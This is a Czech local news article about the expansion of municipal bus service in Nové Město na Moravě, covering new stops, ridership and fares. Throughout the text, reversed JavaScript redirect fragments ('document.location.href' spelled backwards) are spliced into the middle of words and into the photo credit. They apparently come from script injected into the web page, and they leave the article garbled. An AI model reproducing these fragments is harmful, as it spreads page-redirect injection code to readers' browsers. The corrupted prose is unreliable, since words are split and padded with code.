Rainbow page separator

Hromadná doprava se po dvou letech opět rozšíří

Neděle, 10. ledna 2016

MHD Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Dva roky fungování za sebou má městská hromadná au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusová doprava v Novém Městě na Moravě, kterou zajišťuje žďárská přepravní společnost Zdar. Za tu dobu se několikrát změnily jízdní řády a došlo k různým změnám. Do budoucna jsou v Novém Městě plánovány nové zastávky. „Už teď je jasné, že přibudou zastávky v lokalitě Betlém a v budoucnu i na Holubce,“ sdělil starosta Nového Města na Moravě Michal Šmarda.
Loni byla na základě připomínek obyvatel uvedena do provozu zastávka v areálu novoměstské nemocnice. Ze statistik vyplývá, že nejvíce jsou au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové linky využívány ráno při cestách do práce a také školáky a studenty novoměstských škol. Do budoucna nejsou vyloučeny ani mimořádné au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové linky, například do Vysočina Areny nebo Městských lázní.
Jízdné stále zůstává na deseti korunách za dospělého a pět korun za dítě, přičemž držitelé Novoměstské karty mají dopravu městskou au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusovou dopravou zdarma.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: karta.nmnm.cz